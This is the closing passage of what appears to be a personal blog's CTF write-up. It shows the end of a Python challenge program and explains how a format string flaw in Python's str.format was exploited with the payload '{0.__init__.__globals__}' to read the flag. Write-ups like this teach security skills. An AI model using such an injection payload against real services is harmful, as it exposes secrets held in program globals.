        <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
        <span class="n">choice</span> <span class="o">=</span> <span class="n">user_choice</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span>
        <span class="n">choices</span> <span class="o">=</span> <span class="p">{</span>
            <span class="s">'1'</span><span class="p">:</span> <span class="n">show_games</span><span class="p">,</span>
            <span class="s">'2'</span><span class="p">:</span> <span class="n">add_multi</span>
        <span class="p">}</span>
        <span class="n">ans</span> <span class="o">=</span> <span class="n">choices</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">choice</span><span class="p">,</span> <span class="bp">None</span><span class="p">)</span>
        <span class="k">if</span> <span class="ow">not</span> <span class="n">ans</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"There is no such option mate"</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">ans</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>


</code></pre></div></div><p>Several years ago, I read an article about the format string vulnerability in C code. Until today, I never imagined the concept can be applied to python as well. The only thing fishy in the code was the print statement with formatting. Google: “format string vulnerability python” yielded this <a href="https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/">GeeksForGeeks</a> article. I was able to manage to come up with <code class="language-plaintext highlighter-rouge">{0.__init__.__globals__}</code> to read the flag in the game. Anyway, these were all the challenges that I successfully solved during the live event. Event ended about an hour ago, organizers have already published everything to this git <a href="https://github.com/PWrWhiteHats/BtS-CTF-Challenges-03-2021">repository</a>.</p><p>Thanks to those who organized and sponsored the event. It was a really fun experience for me after all.</p><span class="meta"><time datetime="2021-03-14T00:00:00+00:00">March 14, 2021</time> &middot; <a href="/tag/CTF">CTF</a>, <a href="/tag/XSS">XSS</a>, <a href="/tag/format string">format string</a>, <a href="/tag/SQL injection">SQL injection</a></span></section></main></body></html>
